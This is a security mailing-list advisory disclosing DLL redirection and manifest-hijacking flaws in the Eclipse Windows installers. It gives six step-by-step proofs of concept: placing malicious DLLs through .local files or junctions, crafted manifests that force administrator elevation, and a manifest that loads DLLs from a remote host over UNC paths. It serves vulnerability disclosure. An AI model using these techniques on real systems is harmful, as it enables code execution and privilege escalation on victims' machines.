[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Executable installers are vulnerable^WEVIL (case 37): eclipse-inst-win*.exe vulnerable to DLL redirection and manifest hijacking



Hi @ll,

this is a followup to "case 36" (posted as "case 35" by mistake),
<http://seclists.org/bugtraq/2016/Jul/82>.


Proof of concept #1:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the (empty) files "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers:
      Copy NUL: eclipse-inst-win32.exe.local
      Copy NUL: eclipse-inst-win64.exe.local

3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll,
   msvcrt.dll, ..., version.dll in the directory where you saved
   the downloaded installers.

4. Execute the downloaded installers.

DOSSED!

5. Replace the empty DLLs created in step 3 with (malicious) DLLs
   of your choice.

6. Execute the downloaded installer which matches the processor
   architecture of the DLLs placed in step 5.

PWNED!


Proof of concept #2:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the subdirectories "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers.

3. Copy any (malicious) DLL of your choice as kernel32.dll,
   kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll
   into the subdirectories created in step 2 (32-bit DLLs
   into "eclipse-inst-win32.exe.local", 64-bit DLLs into
   "eclipse-inst-win64.exe.local").

4. Execute the downloaded installers.

DOSSED or PWNED!


Proof of concept #3:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the junctions "eclipse-inst-win32.exe.local" and
   "eclipse-inst-win64.exe.local" in the directory where you
   saved the downloaded installers:
      MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32
      MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64

3. Execute the downloaded installers.

DOSSED!

4. Create the two junctions to directories with malicious DLLs of
   your choice if you want to get pwned instead.

5. Execute the downloaded installers.

PWNED!


Proof of concept #4:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win*.exe.manifest ---
   <?xml version="1.0" encoding="US-ASCII" standalone="yes"?>
   <assembly
       manifestVersion="1.0"
       xmlns="urn:schemas-microsoft-com:asm.v1">
   </assembly>
   --- EOF ---

3. Execute the downloaded installers.

DOSSED!


Proof of concept #5:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win*.exe.manifest ---
   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
   <assembly
       manifestVersion="1.0"
       xmlns="urn:schemas-microsoft-com:asm.v1">
       <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
           <security>
               <requestedPrivileges>
                   <requestedExecutionLevel level="requireAdministrator"/>
               </requestedPrivileges>
           </security>
       </trustInfo
   </assembly>
   --- EOF ---

3. Execute the downloaded installers:
   Windows "user account control" will prompt for elevation, all
   hijacked DLLs will be executed with administrative privileges.

PWNED!


Proof of concept #6:
~~~~~~~~~~~~~~~~~~~~

1. On a 64-bit edition of Windows download the 32-bit and 64-bit
   executable installers "eclipse-inst-win32.exe" and
   "eclipse-inst-win64.exe", save them in an arbitrary directory.

2. Create the files "eclipse-inst-win32.exe.manifest" and
   "eclipse-inst-win64.exe.manifest" with the following contents
   in the directory where you saved the downloaded installers:

   --- eclipse-inst-win32.exe.manifest ---
   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
   <assembly
       manifestVersion="1.0"
       xmlns="urn:schemas-microsoft-com:asm.v1">
       <file
           loadFrom="\\127.0.0.1\ADMIN$\System32\Kernel32.Dll"
           name="Kernel32.Dll" />
   </assembly>
   --- EOF ---

   --- eclipse-inst-win64.exe.manifest ---
   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
   <assembly
       manifestVersion="1.0"
       xmlns="urn:schemas-microsoft-com:asm.v1">
       <file
           loadFrom="\\127.0.0.1\ADMIN$\SysWoW64\Kernel32.Dll"
           name="Kernel32.Dll"/>
   </assembly>
   --- EOF ---

   Optionally add more <file> elements for other DLLs loaded by
   the installers as you like.

3. Execute the downloaded installers.

DOSSED!

4. Replace the UNC pathnames to your own host with UNC paths to
   any host reachable from your network where you placed some
   malicious DLLs to get pwned instead.

5. Execute the downloaded installers.

PWNED!

6. Add the <trustinfo> element from poc#5 to achieve remote code
   execution with (user-assisted) escalation of privilege.

7. Execute the downloaded installers.

PWNED²!


stay tuned
Stefan Kanthak


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/